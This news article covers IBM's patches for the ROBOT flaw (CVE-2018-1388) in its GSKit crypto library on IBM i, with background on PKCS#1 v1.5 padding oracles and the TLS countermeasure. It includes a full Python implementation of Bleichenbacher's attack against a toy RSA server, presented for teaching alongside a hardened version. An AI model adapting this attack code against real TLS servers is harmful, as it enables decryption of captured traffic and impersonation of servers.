IBM Patches ‘ROBOT’ Flaw in IBM i Crypto Library
February 21, 2018 Alex Woodie
IBM has issued patches to fix a serious security problem in the IBM Global Security Kit, or GSKit, a relatively obscure crypto package that implements SSL/TLS across a variety of IBM products, including IBM i. An old weakness in the way RSA-encrypted messages are padded and checked, one that lets an attacker decrypt captured traffic by probing the server with modified ciphertexts and watching how it reacts, has resurfaced under a new moniker: “ROBOT.”
GSKit is an IBM toolkit that implements various encryption-related functions, including symmetric and asymmetric ciphers, random number generation, hashing algorithms, and encryption key management, for products that need over-the-wire encryption, including the IBM i, Linux, and AIX operating systems and the WebSphere MQ, WebSphere Application Server, Db2 database, and Tivoli middleware. In addition to the crypto library, it provides command-line tools for managing the key databases and certificates that SSL/TLS connections use.
Among the standards GSKit implements is PKCS#1, the RSA Cryptography Standard, the first in the family of Public-Key Cryptography Standards published by RSA Laboratories. PKCS#1 defines how RSA encryption and signatures are actually applied to bytes, because “textbook” RSA cannot be used as written: it is deterministic and malleable, so a message must first be padded out to the size of the modulus with a fixed structure and random bytes. In the PKCS#1 v1.5 encryption scheme that SSL/TLS uses for RSA key exchange, the padded block starts with the bytes 00 02, followed by at least eight random non-zero bytes, a 00 separator, and then the message. The danger is that a server which reveals, through an error message, a different alert, or even a timing difference, whether a decrypted block had that structure becomes a “padding oracle” that an attacker can query at will.
The whole GSKit package, including its PKCS#1 implementation, is FIPS 140-2 certified, which gives customers confidence in using it. FIPS validation, however, attests that the algorithms are implemented correctly, not that the code around them leaks nothing, and serious problems have been found in how PKCS#1 v1.5 padding failures are handled.
Back in 1998, a security researcher named Daniel Bleichenbacher showed that he could recover data encrypted with Secure Sockets Layer (SSL), which at the time was the industry standard for encrypting a stream of data on a network. By sending the server many carefully modified versions of a captured ciphertext and watching which ones it rejected with a padding error, he could mount an “adaptive chosen-ciphertext” attack that, after an initial search, narrows down the plaintext by roughly one bit per round until only one candidate is left.
In practice, the flaw lets an attacker passively record an RSA-key-exchange handshake and decrypt it later. The attacker multiplies the recorded RSA-encrypted premaster secret by chosen values (RSA is malleable, so the server decrypts each product to a predictable multiple of the original plaintext), submits each result to the server, and uses the server's padding errors to recover the premaster secret and, from it, the session keys. The attack does not recover the server's private RSA key, but the same oracle can be used to forge a signature with that key, which is enough to impersonate the server in a live connection. The error response is often called a “side channel,” though strictly it is a padding oracle: the leak is in what the server says, not in how long or how much power it takes to say it.
However, instead of fixing the problem in a straightforward fashion by moving to a padding scheme without this weakness, the SSL/TLS designers added countermeasures to the protocol itself: a server that finds bad padding must not report it, but must instead continue the handshake with a randomly generated premaster secret, so that a forged ciphertext fails later in a way that looks identical to any other failure. These countermeasures became part of Transport Layer Security (TLS), the follow-on to SSL that was first described in 1999, and which is today a standard method for protecting data passed across HTTP, FTP, and other Internet protocols.
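The padding structure, the 1998 attack and the TLS countermeasure described above, worked through in code. This is an added example written for this article, not GSKit, IBM or ROBOT-project code. It assumes a toy RSA key built from two Mersenne primes (trivially factorable and far too small for real use, chosen only so the attack finishes in well under a second), an 8-byte "premaster secret" because that is all the toy modulus has room for, and two hypothetical servers, leaky_decrypt and hardened_decrypt, that stand in for an unpatched and a patched TLS stack; nothing here reflects how GSKit is implemented.

```python
"""Bleichenbacher padding-oracle attack on a toy RSA/PKCS#1 v1.5 "server", and
the TLS countermeasure. Added illustration, not IBM, GSKit or ROBOT code."""
import secrets

P, Q = (1 << 19) - 1, (1 << 127) - 1  # toy key from two Mersenne primes (deterministic)
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8    # modulus size in bytes (19 here)
B = 1 << (8 * (K - 2))           # conforming plaintexts lie in [2B, 3B)
PMS_LEN = 8                      # TLS premaster is 48 bytes; this modulus holds 8

def pkcs1_v15_pad(msg: bytes) -> int:
    """EME-PKCS1-v1_5 (RFC 8017 7.2.1): 00 02 || random non-zero PS || 00 || msg."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long for this modulus"
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(ps_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")

def rsa_encrypt(msg: bytes) -> int:
    return pow(pkcs1_v15_pad(msg), E, N)

def leaky_decrypt(c: int) -> bytes:
    """VULNERABLE server: distinct errors reveal which padding check failed."""
    block = pow(c, D, N).to_bytes(K, "big")
    if block[:2] != b"\x00\x02":
        raise ValueError("bad block type")   # distinguishable error #1
    sep = block.find(b"\x00", 2)
    if sep < 10:                             # PS must be >= 8 bytes, then 00
        raise ValueError("no separator")     # distinguishable error #2
    return block[sep + 1:]

def leaky_oracle(c: int) -> bool:
    """Attacker's view of leaky_decrypt: did the 00 02 prefix check pass?"""
    try:
        leaky_decrypt(c)
        return True
    except ValueError as err:
        return str(err) != "bad block type"

def hardened_decrypt(c: int) -> bytes:
    """Mitigated server (RFC 5246 7.4.7.1 pattern): never signal bad padding,
    continue with a random premaster instead. Real code must also be constant-time."""
    block = pow(c, D, N).to_bytes(K, "big")
    sep = block.find(b"\x00", 2)
    ok = block[:2] == b"\x00\x02" and sep >= 10 and len(block) - sep - 1 == PMS_LEN
    return block[sep + 1:] if ok else secrets.token_bytes(PMS_LEN)

def _ceil_div(a: int, b: int) -> int:
    return -(-a // b)

def _merge(ivs):  # union of candidate intervals with overlaps collapsed
    out = []
    for a, b in sorted(set(ivs)):
        if out and a <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], b))
        else:
            out.append((a, b))
    return out

def bleichenbacher(c: int, oracle) -> tuple:
    """Recover m = c^d mod N from the oracle alone; returns (m, query_count).
    Step 1 (blinding) is skipped because c is already a conforming ciphertext."""
    queries = 0
    def conforming(s: int) -> bool:
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, E, N) % N)  # RSA is malleable: decrypts to m*s
    M = [(2 * B, 3 * B - 1)]
    s = _ceil_div(N, 3 * B)                  # step 2a: smallest s >= N/(3B)
    while not conforming(s):
        s += 1
    while True:
        new = []                             # step 3: narrow the intervals
        for a, b in M:
            for r in range(_ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, _ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = _merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries          # step 4: one candidate left
        if len(M) > 1:                       # step 2b: linear search for next s
            s += 1
            while not conforming(s):
                s += 1
            continue
        a, b = M[0]                          # step 2c: choose r, s to halve [a, b]
        r = _ceil_div(2 * (b * s - 2 * B), N)
        while True:
            s_lo, s_hi = _ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a
            s_next = next((t for t in range(s_lo, s_hi + 1) if conforming(t)), None)
            if s_next is not None:
                s = s_next
                break
            r += 1

if __name__ == "__main__":
    m, q = bleichenbacher(rsa_encrypt(b"premaster"[:PMS_LEN]), leaky_oracle)
    print("recovered", m.to_bytes(K, "big")[-PMS_LEN:], "after", q, "oracle queries")
```

Run it and the attacker recovers the premaster secret after a few thousand oracle queries; a real-size key with a stricter oracle needs many more, but the procedure is identical. The only difference between the two servers is that hardened_decrypt returns a random premaster instead of raising, so the attacker's oracle sees the same behaviour for every ciphertext and the interval-narrowing loop has nothing to work with. That is the whole countermeasure, and it has to hold on every error path and in timing, not just for the block-type check shown here, which is exactly the kind of gap ROBOT found in shipped implementations.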
A stronger padding scheme, RSA-OAEP, was added to PKCS#1 in version 2.0 and is retained in the current version 2.2, but TLS never adopted it for key exchange, so it is not in widespread use there. That leaves servers on the older v1.5 scheme, and the increasingly complex workarounds required to keep it safe, which must be applied on every error path and in constant time, have left a number of RSA implementations exposed.
In December, a group of security researchers showed that, by using a variation of Bleichenbacher's technique, they could decrypt traffic to, or sign messages on behalf of, modern HTTPS servers running the then-current TLS 1.2. Hanno Böck, Juraj Somorovsky, and Craig Young called it Return Of Bleichenbacher's Oracle Threat, or ROBOT.
“Some of the most popular webpages on the Internet were affected, including Facebook and Paypal,” the researchers wrote on their website, called The ROBOT Attack. “In total, we found vulnerable subdomains on 27 of the top 100 domains as ranked by Alexa.”
The researchers also identified a handful of hardware and software vendors whose handling of PKCS#1 v1.5 padding leaves their customers open to the attack. In addition to IBM, impacted vendors listed on the ROBOT Attack website include Citrix Systems, F5 Networks, Cisco Systems, and Palo Alto Networks, among others.
On February 1, the IBM GSKit vulnerability was assigned the Common Vulnerabilities and Exposures identifier CVE-2018-1388. Owing to the high potential impact on the confidentiality and integrity of data and the low complexity of the attack, which needs nothing more than network access to the server, the flaw carries a CVSS base score of 9.1, which is very high.
According to a security bulletin published on January 15, IBM had issued PTFs that address the flaw in IBM i 7.1, 7.2, and 7.3. On February 6, IBM issued a security bulletin alerting IBM i users to the flaw and to the availability of the patches. Three days later, it published a post on the Product Security Incident Response Team (PSIRT) blog pointing users to the security bulletin and the patches.
All three supported releases of IBM i are affected. IBM recommends that IBM i customers immediately apply the following PTFs to fix the ROBOT flaw:
IBM i 7.1 — MF64537
IBM i 7.2 — MF64536
IBM i 7.3 — MF64534
In its APAR for the ROBOT attack, published in January, IBM says every release of the IBM i operating system going back to i5/OS V5R1 is affected by the ROBOT vulnerability in GSKit. IBM did not issue patches for the older, unsupported releases. For those, the only protection is to stop offering the TLS cipher suites that use RSA key exchange (the ones whose names begin with TLS_RSA_), which is something IBM recommends users of IBM i 7.2 and 7.3 do anyway. This concerns how session keys are exchanged, not RSA certificates as such: suites such as ECDHE_RSA still authenticate the server with an RSA certificate but derive the session keys through an ephemeral Diffie-Hellman exchange, so there is no RSA-encrypted premaster secret for an oracle attack to recover.
In addition to patching IBM i, IBM patched several releases of WebSphere MQ to address the GSKit vulnerabilities.